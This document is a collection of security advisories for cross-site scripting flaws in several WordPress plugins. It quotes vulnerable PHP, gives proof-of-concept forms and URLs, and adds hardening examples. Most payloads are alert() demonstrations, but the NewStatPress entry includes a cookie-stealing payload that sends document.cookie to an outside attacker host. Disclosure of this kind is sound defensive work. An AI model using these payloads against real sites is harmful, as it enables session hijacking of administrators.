------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_magic_fields_1_wordpress_plugin.html
[2] http://magicfields.org/
[3] https://github.com/hunk/Magic-Fields/releases/tag/1.7.2
[4] https://github.com/hunk/Magic-Fields/releases
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Gwolle Guestbook WordPress Plugin
------------------------------------------------------------------------
Radjnies Bhansingh, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Gwolle Guestbook
[2] WordPress plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure a WordPress user with editor or
administrator privileges into opening a malicious website. 

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0033

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Gwolle Guestbook [2] WordPress
Plugin version 1.7.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue was fixed in Gwolle Guestbook version 2.1.1. The most
recent version of Gwolle Guestbook can be obtained from the following
location:
https://wordpress.org/plugins/gwolle-gb/ [2]

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Gwolle Guestbook for WordPress is a guestbook made in order to provide
an easy and slim way to integrate a guestbook into your WordPress
powered site. Don't use your 'comment' section the wrong way - install
Gwolle Guestbook and have a real guestbook.

A Cross-Site Scripting vulnerability was found in Gwolle Guestbook. This
issue allows an attacker to perform a wide variety of actions, such as
stealing Administrators' session tokens, or performing arbitrary actions
on their behalf. 

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue can be exploited by an anonymous attacker that sends a
Cross-Site Scripting payload via one of the input fields of the
guestbook. These fields are visible in the guestbook entries tab.
Whenever an editor or administrator reviews the entry the payload is
executed. 

An example of this vulnerability exists in the
/gwolle-gb/admin/page-editor.php file on line 434:
<input type="text" name="gwolle_gb_author_origin" tabindex="3"
class="wp-exclude-emoji" placeholder="<?php _e('City', 'gwolle-gb'); ?>"
value="<?php echo gwolle_gb_sanitize_output(
$entry->get_author_origin() ); ?>" id="author_origin" />

------------------------------------------------------------------------
Proof of Concept
------------------------------------------------------------------------
A proof of concept attack is listed below:

<html>
	<body>
		<form action="https://<target>/" method="POST">
			<input type="hidden" name="gwolle_gb_function" value="add_entry"/>
			<input type="hidden" name="gwolle_gb_book_id" value="1"/>
			<input type="hidden" name="gwolle_gb_author_name" value="John"/>
			<input type="hidden" name="gwolle_gb_author_origin"
value="amsterdam&quot; onmouseover=alert(1) a=&quot;"/>
			<input type="hidden" name="gwolle_gb_author_email"
value="john&#64;d&#46;oe"/>
			<input type="hidden" name="gwolle_gb_author_website" value=""/>
			<input type="hidden" name="gwolle_gb_subject" value=""/>
			<input type="hidden" name="gwolle_gb_content"
value="hi&#44;&#32;cool"/>
			<input type="hidden" name="gwolle_gb_wpnonce" value="<valid nonce>"/>
			<input type="hidden" name="gwolle_gb_submit" value="Submit"/>
			<input type="submit"/>
		</form>
	</body>
</html>


A victim editor or administrator then needs to open the following view
page:
http://<target>/wp-admin/admin.php?page=gwolle-gb/editor.php&entry_id=13

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_gwolle_guestbook_wordpress_plugin.html
[2] https://wordpress.org/plugins/gwolle-gb/
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Tribulant Slideshow Galleries
WordPress Plugin
------------------------------------------------------------------------
Spyros Gasteratos, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Tribulant
Slideshow Galleries WordPress Plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160714-0016

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Tribulant Slideshow Galleries [2]
WordPress Plugin version 1.6.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
A fix for this issue is not available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Tribulant Slideshow Galleries [2] WordPress Plugin allows you to
feature WordPress content in a beautiful and fast JavaScript-powered
slideshow gallery. A Cross-Site Scripting vulnerability has been found
in the Tribulant Slideshow Galleries plugin. This issue allows an
attacker to perform a wide variety of actions, such as stealing
Administrators' session tokens, or performing arbitrary actions on their
behalf. In order to exploit this issue, the attacker has to lure/force a
logged on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
A reflected cross site scripting vulnerability exists in the plugin
Slideshow Galleries. This issue is due to the fact that the
view/admin/galleries/index.php file uses the following code to output an
HREF link:
"<a href="<?php echo GalleryHtmlHelper::retainquery('orderby=id&order='
.(($orderby == "id") ? $otherorder : "asc")); ?>">"

The above code fails to perform any output encoding on the retainquery
method, thus allowing the tag to be closed and to inject a script
element:
/wp-admin/admin.php?page=slideshow-galleries&method=save"><script>alert(1)<%2fscript>pwned

Please note that this particular method is called another 19 times in
the project. This indicates that more similar vulnerabilities could
exist in the code.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<target>/wp-admin/admin.php?page=slideshow-galleries&method=savegtlcq%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Exsxa2

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_tribulant_slideshow_galleries_wordpress_plugin.html
[2] https://wordpress.org/plugins/slideshow-gallery/
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Trust Form WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Trust Form
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0018

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Trust Form [2] WordPress Plugin
version 2.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Trust Form [2] WordPress Plugin is a contact form with confirmation
screen and mail and data base support. A Cross-Site Scripting
vulnerability was found in the Trust Form WordPress Plugin. This issue
allows an attacker to perform a wide variety of actions, such as
stealing Administrators' session tokens, or performing arbitrary actions
on their behalf. In order to exploit this issue, the attacker has to
lure/force a logged on WordPress Administrator into opening a malicious
website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in several PHP files and is caused by the lack of
output encoding on the page request parameter. The vulnerable code is
listed below.

edit-list.php:

<input type="hidden" name="page" value="<?php echo $_REQUEST['page'];
?>" />

entries-list.php:

<input type="hidden" name="page" value="<?php echo $_REQUEST['page']
?>"; />

trust-form.php:

$trash_url  = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'trash', $this->id, $item['ID'] );
	
[...]
	
        $read_url = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'read', $this->id, $item['ID'] );
	
[...]
	
                'view'     => sprintf( '<a
href="?page=%s&action=%s&form=%s&entry=%s">'.__( 'View',
TRUST_FORM_DOMAIN ).'</a>', $_REQUEST['page'], 'edit', $this->id,
$item['ID'] ),
	
[...]
	
        $new_url = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'new', $this->id, $item['ID'] );
	
[...]
	
                'view'     => sprintf( '<a
href="?page=%s&action=%s&form=%s&entry=%s">'.__( 'View',
TRUST_FORM_DOMAIN ).'</a>', $_REQUEST['page'], 'edit', $this->id,
$item['ID'] ),
	
[...]
	
$trash_url  = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'trash', $this->id, $item['ID'] );
	
[...]
	
$read_url = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'read', $this->id, $item['ID'] );
	
[...]
	
        'view'     => sprintf( '<a
href="?page=%s&action=%s&form=%s&entry=%s">'.__( 'View',
TRUST_FORM_DOMAIN ).'</a>', $_REQUEST['page'], 'edit', $this->id,
$item['ID'] ),
	
[...]
	
$trash_url  = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'trash', $this->id, $item['ID'] );
	
[...]
	
$new_url = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'new', $this->id, $item['ID'] );
	
[...]
	
        'view'     => sprintf( '<a
href="?page=%s&action=%s&form=%s&entry=%s">'.__( 'View',
TRUST_FORM_DOMAIN ).'</a>', $_REQUEST['page'], 'edit', $this->id,
$item['ID'] ),
	
[...]
	
$delete_url = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'delete', $this->id, $item['ID'] );
	
[...]
	
$restore_url = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'untrash',$this->id, $item['ID'] );
	
[...]
	
$trash_url = sprintf( '?page=%s&action=%s&form=%s' ,$_REQUEST['page'],
'trash', $item['ID'] );
	
[...]
	
$duplicate_url = sprintf( '?page=%s&action=%s&form=%s',
$_REQUEST['page'], 'duplicate', $item['ID'] );
	
[...]
	
        'edit'      => sprintf( '<a href="?page=%s&action=%s&form=%s">'
.__( 'Edit', TRUST_FORM_DOMAIN ). '</a>', $_REQUEST['page'], 'edit',
$item['ID'] ),
	
[...]
	
$delete_url = sprintf( '?page=%s&action=%s&form=%s' ,$_REQUEST['page'],
'delete', $item['ID'] );
	
[...]
	
$restore_url = sprintf( '?page=%s&action=%s&form=%s' ,$_REQUEST['page'],
'untrash', $item['ID'] );

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter. 

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://192.168.146.137/wp-admin/admin.php?page=trust-form-edit"
method="POST">
			<input type="hidden" name="page"
value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_trust_form_wordpress_plugin.html
[2] https://wordpress.org/plugins/trust-form/
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in WP-Filebase Download Manager
WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the WP-Filebase
Download Manager WordPress Plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0019

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WP-Filebase Download Manager [2]
WordPress Plugin version 3.4.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WP-Filebase Download Manager [2] WordPress Plugin adds a powerful
download manager including file categories, downloads counter, widgets,
sorted file lists and more to your WordPress blog. A Cross-Site
Scripting vulnerability was found in the WP-Filebase Download Manager
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.
 
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file AdminGuiFiles.php and is caused by the lack
of output encoding on the page request parameter. The vulnerable code is
listed below.

<form id="posts-filter" action="" method="post">
<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>"
/>
<?php $file_table->display() ?>
</form>

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter.
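The hidden "page" field is the same in the Trust Form (edit-list.php, entries-list.php) and WP-Filebase (AdminGuiFiles.php) advisories above. The following is an added example, not code from either plugin: it shows the field in its vulnerable and hardened form and how a POST value reaches $_REQUEST; esc_attr() is given a stand-in so the file runs outside WordPress.

```php
<?php
// Added example; not code from the Trust Form or WP-Filebase plugins.
// Shows the hidden "page" field from both advisories, vulnerable and
// hardened, and why reading it from $_REQUEST matters. Assumes PHP's
// default request ordering (GET, then POST): for a key present in both,
// the POST value is the one that ends up in $_REQUEST.

// Stand-in for WordPress esc_attr() so this file runs outside WordPress.
// Inside a plugin, use the real esc_attr() and omit this definition.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' );
    }
}

// Vulnerable form (edit-list.php / AdminGuiFiles.php): the value comes
// from $_REQUEST and is echoed unencoded inside a double-quoted attribute,
// so a double quote in it terminates the attribute.
function page_field_vulnerable( array $request ) {
    $page = isset( $request['page'] ) ? (string) $request['page'] : '';
    return '<input type="hidden" name="page" value="' . $page . '" />';
}

// Hardened form: take the value from $_GET, which is the array WordPress
// itself reads for admin.php page routing, and encode it for the attribute
// context. The encoding is what actually stops the injection; reading
// $_GET additionally closes the GET/POST pollution path.
function page_field_hardened( array $get ) {
    $page = isset( $get['page'] ) ? (string) $get['page'] : '';
    return '<input type="hidden" name="page" value="' . esc_attr( $page ) . '" />';
}

// Constructed request: a benign "page" in the URL and a conflicting one in
// the POST body. array_merge() with POST last reproduces what $_REQUEST
// holds under the default ordering.
$get     = array( 'page' => 'trust-form-edit' );
$post    = array( 'page' => 'x" data-injected="1' );
$request = array_merge( $get, $post );

echo "Vulnerable, from \$_REQUEST: ", page_field_vulnerable( $request ), PHP_EOL;
echo "Hardened,   from \$_GET:     ", page_field_hardened( $get ), PHP_EOL;
echo "Hardened,   same bad value: ", page_field_hardened( $post ), PHP_EOL;
```

The third line of output shows that the encoding alone neutralises the injected quote even when the bad value does arrive, which is why the fix should not rely on switching arrays only.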

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/admin.php?page=wpfilebase_files"
method="POST">
			<input type="hidden" name="page"
value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_wp_filebase_download_manager_wordpress_plugin.html
[2] https://wordpress.org/plugins/wp-filebase/
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in WP-SpamFree Anti-Spam WordPress
Plugin
------------------------------------------------------------------------
Radjnies Bhansingh, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A reflected Cross-Site Scripting vulnerability exists in the WP-SpamFree
Anti-Spam WordPress plugin. This vulnerability allows an attacker to
perform any action with the privileges of the target user. The affected
code is not protected with an anti-Cross-Site Request Forgery token.
Consequently, it can be exploited by luring the target user into
clicking a specially crafted link or visiting a malicious website (or
advertisement).

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0026

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the WP-SpamFree Anti-Spam [2]
WordPress Plugin version 2.1.1.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
A reflected Cross-Site Scripting vulnerability exists in the WP-SpamFree
Anti-Spam WordPress plugin. This vulnerability allows an attacker to
perform any action with the privileges of the target user. The affected
code is not protected with an anti-Cross-Site Request Forgery token.
Consequently, it can be exploited by luring the target user into
clicking a specially crafted link or visiting a malicious website (or
advertisement).

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability exists in the wp-spamfree.php file on line 6049:

$blacklist_keys_update =
trim(stripslashes($_REQUEST['wordpress_comment_blacklist']));

In order to exploit this issue the target user must click a specially
crafted link or visit a malicious website (or advertisement) and must be
authenticated within WordPress.

In addition the WordPress specific blacklist can be cleared by using the
request below and employing CSRF.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept code demonstrates this issue:
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=wp-spamfree%2Fwp-spamfree.php"
method="POST">
			<input type="hidden" name="submitted_wpsf_general_options"
value="1"/>
			<input type="hidden" name="use_alt_cookie_method" value="on"/>
			<input type="hidden" name="comment_logging_all" value="on"/>
			<input type="hidden" name="enhanced_comment_blacklist" value="on"/>
			<input type="hidden" name="wordpress_comment_blacklist"
value="</textarea><script>alert(1)</script>foo&#13;&#10;bar&#13;&#10;press&#13;&#10;"/>
			<input type="hidden" name="allow_proxy_users" value="on"/>
			<input type="hidden" name="promote_plugin_link" value="on"/>
			<input type="hidden" name="submit_wpsf_general_options"
value="Update&#32;Options&#32;&#37;B"/>
			<input type="submit"/>
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_wp_spamfree_anti_spam_wordpress_plugin.html
[2] https://wordpress.org/plugins/wp-spamfree/
------------------------------------------------------------------------
Persistent Cross-Site Scripting in the WordPress NewStatPress plugin
------------------------------------------------------------------------
Han Sahin, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting (XSS) vulnerability has been found in
the WordPress NewStatPress plugin. By using this vulnerability an
attacker can inject malicious JavaScript code into the application,
which will execute within the browser of any user who views the relevant
application content. 

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0030

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WordPress NewStatPress plugin [2]
version 1.2.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in NewStatPress version 1.2.5. This
version can be downloaded from the NewStatPress GitHub account:
https://github.com/lechab/newstatpress#125 [3]

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WordPress NewStatPress plugin [4] is a real-time plugin to manage
the visits' statistics on a WordPress site. It doesn't require external
web analytics. A persistent Cross-Site Scripting vulnerability has been
discovered in the WordPress NewStatPress plugin which allows an
unauthenticated attacker to inject malicious JavaScript code into the
application, which will execute within the browser of any user who views
the relevant application content. The attacker-supplied code can perform
a wide variety of actions, such as stealing victims' session tokens or
login credentials, performing arbitrary actions on their behalf,
logging their keystrokes, or delivering malware.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The WordPress NewStatPress plugin fails to sufficiently check input
supplied to a GET request for a resource on a WordPress site with a
vulnerable version of the NewStatPress plugin. In addition input
supplied to the Referer header is insufficiently sanitized. As a result
a malicious request will be stored on the Last Visitors and Visitors tab
of the Visits page, executing the payload when an unsuspecting user
views one of the mentioned tabs on this page. 

Persistent Cross-Site Scripting vulnerabilities are typically more
serious than reflected vulnerabilities because they do not require a
separate delivery mechanism in order to reach target users, in this case
potentially a WP admin reviewing the stats.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
This vulnerability can be demonstrated by submitting the following
request:
GET /sumofpwn/"><script>alert(document.cookie);</script> HTTP/1.1
Host: 192.168.28.129
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla Chrome/51.0.2704.103 Safari/537.36
Referer: javascript:document.location=`http://www.XXXXXXyourhackerdomainXXXXXX.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,nl;q=0.6
Connection: close

Based on the above request, the vulnerable output will be:
1) <a href="/?/sumofpwn/\&quot;><script>alert(document.cookie);</script>"
target="_blank">/sumofpwn/\"&gt;<script>alert(document.cookie);</script></a>
2) Arrived from <a href="javascript:document.location=`http://www.sfylabs.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);"
target="_blank">javascript:document.location=`http://www.sfylabs.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie);</a>

The stored payload is rendered on the following admin pages:
http://yourhost/wp-admin/admin.php?page=nsp_main
http://yourhost/wp-admin/admin.php?page=nsp_visits
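As an added example (not NewStatPress code), the following renders stored visitor values shaped like the two in the output above, first unescaped as the plugin does and then with context-specific escaping; esc_url() and esc_html() are given simplified stand-ins so the file runs outside WordPress.

```php
<?php
// Added example; not code from the NewStatPress plugin. Renders a stored
// request path or Referer value as a link, first the way the advisory's
// vulnerable output does it, then hardened. Stand-ins for esc_url() and
// esc_html() are defined so this runs outside WordPress; in a plugin use
// the real functions and omit them.

if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' );
    }
}

if ( ! function_exists( 'esc_url' ) ) {
    // Simplified stand-in: WordPress esc_url() returns '' for a URL whose
    // scheme is not in wp_allowed_protocols() (javascript: is not). Only
    // http, https and scheme-less (relative) URLs are kept here; the real
    // function also strips characters that are invalid in a URL.
    function esc_url( $url ) {
        $url = trim( (string) $url );
        if ( preg_match( '#^([a-z][a-z0-9+.\-]*):#i', $url, $m ) ) {
            if ( ! in_array( strtolower( $m[1] ), array( 'http', 'https' ), true ) ) {
                return '';
            }
        }
        return htmlspecialchars( $url, ENT_QUOTES, 'UTF-8' );
    }
}

// Vulnerable rendering, shaped like the advisory's output: the stored
// value is concatenated straight into both the href and the link text,
// so markup in it becomes part of the page and a javascript: URL stays
// clickable.
function visitor_link_vulnerable( $stored ) {
    return '<a href="' . $stored . '" target="_blank">' . $stored . '</a>';
}

// Hardened rendering: esc_url() for the URL context (drops non-http(s)
// schemes), esc_html() for the text node. A rejected URL is shown as
// plain text with no link at all.
function visitor_link_hardened( $stored ) {
    $href = esc_url( $stored );
    if ( '' === $href ) {
        return esc_html( $stored );
    }
    return '<a href="' . $href . '" target="_blank">' . esc_html( $stored ) . '</a>';
}

// Constructed samples modelled on the advisory: a request path carrying
// markup, a Referer with a javascript: scheme (payload replaced by a
// placeholder), and an ordinary referrer that must survive untouched.
$samples = array(
    '/sumofpwn/"><b>injected</b>',
    'javascript:PLACEHOLDER',
    'https://example.com/ref?x=1&y=2',
);

foreach ( $samples as $s ) {
    echo 'vulnerable: ', visitor_link_vulnerable( $s ), PHP_EOL;
    echo 'hardened:   ', visitor_link_hardened( $s ), PHP_EOL;
}
```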

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_the_wordpress_newstatpress_plugin.html
[2] https://downloads.wordpress.org/plugin/newstatpress.1.2.4.zip
[3] https://github.com/lechab/newstatpress#125
[4] https://wordpress.org/plugins/newstatpress/

------------------------------------------------------------------------
Reflected Cross-Site Scripting in FormBuilder WordPress Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A reflected Cross-Site Scripting vulnerability has been found in the
FormBuilder [2] WordPress plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0006

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on FormBuilder [2] version 1.05.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
A fix for this issue is currently not available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The FormBuilder [2] WordPress plugin allows you to build contact forms
in the WordPress administrative interface without needing to know PHP or
HTML. 

A reflected Cross-Site Scripting vulnerability has been found in the
FormBuilder WordPress plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists due to the fact that neither the fbmsg nor the
formSearchQuery field in the tools.php file validates <script> tags or
performs output encoding. As a result, malicious script code can be
added to these fields.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept code demonstrates this issue:

- http://<target>/wp-admin/tools.php?page=formbuilder.php&pageNumber&fbtag&fbaction=forms&fbmsg=<script>alert(1)</script>n edit it <a href="/wp-admin/tools.php?page=formbuilder.php&pageNumber=&fbtag=&fbaction=editForm&fbid=9">here</a>
- http://<target>/wp-admin/tools.php?page=formbuilder.php&fbaction=formResults&formSearchQuery="><script>alert(1)</script>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/reflected_cross_site_scripting_in_formbuilder_wordpress_plugin.html
[2] https://wordpress.org/plugins/formbuilder/
------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in Contact Form WordPress
Plugin
------------------------------------------------------------------------
Julien Rentrop, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability was found in the Contact
Form WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0042

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Contact Form by BestWebSoft [2]
WordPress Plugin version 4.0.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is partially resolved in Contact Form version 4.0.2 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Contact Form [2] WordPress Plugin enables sites to receive messages
from customers. A stored Cross-Site Scripting vulnerability was found in
the Contact Form WordPress Plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing users' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a victim into opening
a malicious website/link.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
When enabled, an attachment can be uploaded through the contact form. The
upload accepts HTML files, which are stored in the /wp-content/uploads
directory. Since the contents of this HTML file are fully controlled by
the sender, it can be used to mount a Cross-Site Scripting attack.

The attack is possible because, when form validation fails, the unlink()
call that is supposed to clean up the already stored file is never
executed.

I tried to escalate this attack further to code execution (uploading a
PHP file); however, this is prevented by a whitelist.

Source file:
https://plugins.svn.wordpress.org/contact-form-plugin/trunk/contact_form.php

When Apache is configured to show directory listings, exploiting this
issue is easier since the file name does not have to be derived. When
directory listings are disabled the attack should still be possible,
since the file name is generated with this code:

md5( sanitize_file_name( $_FILES["cntctfrm_contact_attachment"]["name"] ) . time() . $email )

Only the server's time is not known exactly, but it could be determined.
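As an added example (not the Contact Form plugin's code), a PHP attachment handler that addresses both problems described above: browser-renderable types are absent from the extension allow-list, and the file is validated before it is moved, so a rejected submission never leaves a file in the uploads directory in the first place. Function, field and option names are assumptions.

```php
<?php
// Added example, not code from the Contact Form plugin. Names are illustrative.

// Allow-list of attachment extensions. Types a browser renders as markup
// (html, htm, svg, xhtml, xml) are deliberately absent: such a file served
// from /wp-content/uploads executes script in the site's origin.
const SAFE_ATTACHMENT_EXT = ['pdf', 'txt', 'doc', 'docx', 'odt', 'jpg', 'jpeg', 'png', 'gif'];

/**
 * Validate the submission and, only if everything is valid, move the
 * attachment into $upload_dir.
 * Returns: the stored path (string), an array of error messages if the
 * submission was rejected, or null when there was nothing to store.
 */
function accept_contact_attachment(array $post, array $files, string $upload_dir)
{
    $errors = [];
    if (!is_email($post['email'] ?? '')) {
        $errors[] = 'Invalid e-mail address.';
    }

    $att = $files['contact_attachment'] ?? null;
    if ($att === null || $att['error'] !== UPLOAD_ERR_OK) {
        return $errors ?: null;
    }

    $name = sanitize_file_name($att['name']);
    $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    // Check the extension, then what WordPress thinks the file really is.
    $type = wp_check_filetype_and_ext($att['tmp_name'], $name);
    if (!in_array($ext, SAFE_ATTACHMENT_EXT, true) || $type['ext'] === false) {
        $errors[] = 'Attachment type not allowed.';
    }

    // Validate BEFORE moving the file. The original bug was that the file was
    // already in the uploads directory when validation failed, and the
    // unlink() that should have removed it never ran. Here a rejected upload
    // only ever exists as PHP's temporary file, which is discarded at request end.
    if ($errors) {
        return $errors;
    }

    $dest = rtrim($upload_dir, '/') . '/' . wp_unique_filename($upload_dir, $name);
    if (!move_uploaded_file($att['tmp_name'], $dest)) {
        return ['Could not store attachment.'];
    }
    return $dest;
}
```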

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
#1 Manual (or see the example request):
Go to a page with the contact form, select an HTML file, enter some
invalid input (such as email: invalid@...) and send.

#2 Navigate to uploaded file:
http://<target>/wp-content/uploads/

#3 Example of stored file:
